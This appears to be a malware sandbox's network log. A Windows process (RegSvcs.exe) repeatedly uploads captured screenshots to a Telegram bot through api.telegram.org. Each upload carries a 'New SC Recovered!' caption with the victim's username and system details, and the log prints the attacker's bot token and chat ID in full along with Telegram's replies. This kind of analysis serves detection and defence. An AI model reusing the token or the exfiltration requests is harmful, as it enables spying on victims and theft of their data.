                                                                                      2024-12-06 04:52:46 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:52:46 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:52:46 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:52:46 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:52:46 UTC1364OUTData Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07
                                                                                      Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
                                                                                      2024-12-06 04:52:46 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd2db458e448f1--
                                                                                      2024-12-06 04:52:46 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:52:47 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:52:47 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170401,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460767,"document":{"file_name":"user-610930 2025-01-05 18-11-16.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZoWdSgx_ZP9XMovO0yRZ54pnhVZ6mAALvFAACOh6ZUsiWfhYkasBXAQAHbQADNgQ","file_unique_id":"AQAD7xQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZoWdSgx_ZP9XMovO0yRZ54pnhVZ6mAALvFAACOh6ZUsiWfhYkasBXAQAHbQADNgQ","file_unique_id":"AQAD7xQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaFnUoMf2T_VzKLztMkWeeKZ4VWepgAC7xQAAjoemVLIln4WJGrAVzYE","file_unique_id":"AgAD7xQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 01/05/2025 18:11:13\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.449882149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:52:54 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd33c42d569f7a
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66950
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:52:54 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 33 2f 32 30 32 35 20 31 31 3a 31 39 3a 33 32 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd33c42d569f7aContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd33c42d569f7aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/13/2025 11:19:32User
                                                                                      2024-12-06 04:52:54 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:52:54 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:52:54 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:52:54 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:52:54 UTC1364OUTData Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07
                                                                                      Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
                                                                                      2024-12-06 04:52:54 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd33c42d569f7a--
                                                                                      2024-12-06 04:52:54 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:52:55 UTC1514INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:52:55 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1125
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170402,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460775,"document":{"file_name":"user-610930 2025-01-13 11-19-42.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZomdSgycyXjWJrx2Hm9uyRCk6CqbHAALwFAACOh6ZUpn8g9oYAAGSoQEAB20AAzYE","file_unique_id":"AQAD8BQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZomdSgycyXjWJrx2Hm9uyRCk6CqbHAALwFAACOh6ZUpn8g9oYAAGSoQEAB20AAzYE","file_unique_id":"AQAD8BQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaJnUoMnMl41ia8dh5vbskQpOgqmxwAC8BQAAjoemVKZ_IPaGAABkqE2BA","file_unique_id":"AgAD8BQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 01/13/2025 11:19:32\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.449909149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:05 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd3e24c46652e2
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:53:05 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 36 2f 32 30 32 35 20 31 35 3a 31 36 3a 31 39 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd3e24c46652e2Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3e24c46652e2Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/26/2025 15:16:19User
                                                                                      2024-12-06 04:53:05 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:05 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:05 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:05 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 